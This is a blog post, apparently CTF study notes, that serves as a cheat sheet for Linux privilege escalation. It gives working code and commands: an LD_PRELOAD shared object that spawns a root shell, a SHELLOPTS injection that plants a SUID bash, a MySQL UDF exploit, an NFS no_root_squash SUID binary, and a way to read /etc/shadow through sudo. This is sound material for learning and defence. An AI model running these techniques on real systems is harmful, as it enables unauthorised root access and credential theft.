Post

Linux Privilege Escalation

Posted Updated
By Gaurav
4 min read
Linux Privilege Escalation

Privilege Escalation is searching for ways to run commands that require elevated access permissions, Eg. reading /etc/shadow file.

Information Gathering

Once you have access to a remote machine, here is the list of different information to gather to explore ways to escalate privilege:

  1. hostname - machine name
  2. uname -a - Operating System information
  3. /proc/version - only for linux to get kernel details
  4. /etc/issue - system information
  5. /etc/os-release - OS information
  6. ps auxjf - list of running process
  7. env - environment variables
  8. sudo -l - check sudo permission
  9. ls - Accessible files
  10. id - user information
  11. /etc/passwd - other available users
  12. history - interesting commands ran in previous sessions by user
  13. ifconfig - network info
  14. ip route - available network routes
  15. netstat - display network communications

Automated Enumeration

Different tools to check available escalation options:

Escalation Techniques

kernel exploits

  • Check the kernel version of the system: uname -a, cat /proc/version, cat /etc/issue
  • Search for any exploit published for that version on exploit-db
  • Here is one script to find kernel exploits: Linux exploit Suggester
  • Trick the kernel into running our payload in kernel mode
  • Exploit
  • Eg. DirtoCoW

Note: Kernel exploit can be irreversable to the system, so run cautiously for the exact version only.

Sudo permissions

  • Check sudo permissions: sudo -l
  • Collated list of ways to use different sudo permissions for privilege escalation GTFObins
  • Search on the above site and see if any of the binaries can be exploited for privilege escalation
  • Check if any of the environment variable retained by env_keep can be used for escalation. Eg. LD_PRELOAD can be used to override functions from shared library
  • exploit
  • Eg.
1
2
3
4
5
6
7
8

# Abuse shell debugging feature
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2


# Abuse sudo permission on apache
# Shows first line of shadow file in the error
sudo apache2 -f /etc/shadow
  • Example of abusing environment variable LD_PRELOAD or LD_LIBRARY_PATH

  • This link Cheat Inject Feature provides detailed explanation on using above variables to modify the binary behavior.

  • Consider this C program
1
2
3
4
5
6
7
8
9
10
11
12
13

// preload.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
  unsetenv("LD_PRELOAD");
  setgid(0);
  setuid(0);
  system("/bin/bash");
}
  • Above program can be injected to any binary if we can modify LD_PRELOAD or LD_LIBRARY_PATH env variable.
1
2
3
4
5
6
7

# use LD_PRELOAD:
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so <program-name-here>

# use LD_LIBRARY_PATH:
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp <program-name-here>

SUID binaries

  • find SUID binaries: find / -type f -perm -04000 -ls 2>/dev/null, find / -type f -perm -u+s -exec ls -l {} \; 2> /dev/null
  • find SGID binaries: find / -type f -perm -02000 -ls 2>/dev/null, find / -type f -perm -g+s -exec ls -l {} \; 2> /dev/null
  • find both: find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
  • Use below command to create a password hash if we can edit passwd or shadow file, Eg. using SUID cp or mv command
1
2
3
4
5

# create unix password hash:
openssl passwd -1 -salt [salt] [password]
openssl passwd newpasswordhere
mkpasswd -m sha-512 newpasswordhere

Cron jobs

  • Global cron config is stored in /etc/crontab
  • see if any script from the job is world writable.

PATH variable

  • Check if any binary is using a relative path which can be influenced by the PATH variable: echo $PATH

File capabilities:

  • find capabilities of all the files under root directory: getcap -r / 2> /dev/null
  • These capabilities enables extra permissions which are not part of sudo permission list, but same approach of sudo applies here.
  • check man capabilities for list of capabilities

Different services

mysql escalation

  • create payload
1
2

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
  • exploit
1
2
3
4
5
6
7
8
9
10
11
12
13

mysql -u root

# inside mysql shell
use mysql;

create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

# exploit
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

NFS

  • NFS (Network File Sharing) configuration is kept in the /etc/exports file.
  • If any directory is shared with no_root_squash flag, then it can be exploited
  • Consider this c code
1
2
3
4
5
6
7
8
9
10
11
12

// nfs.c

#include <stdlib.h>
#include <unistd.h>

int main()
{
  setgid(0);
  setuid (0);
  system("/bin/bash");
  return 0;
}
  • Generate the executable and copy it to the mounted share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

# Set SUID as root owner
gcc -static nfs.c -o nfs
chmod +s nfs

# Enumerate mountable shares:
showmount -e 10.0.2.12

# Mount the shared directory

# Craete mount point locally
mkdir /tmp/shmount

# Mount '/backups/' directory from the target machine to local system
mount -o rw 10.0.2.12:/backups /tmp/shmount

cp ./nfs /tmp/shmount
  • Run the ./nfs on the target machine

References

CTF, Privilege Escalation
privilege-escalation linux ctf suid sudo ldpreload
This post is licensed under CC BY 4.0 by the author.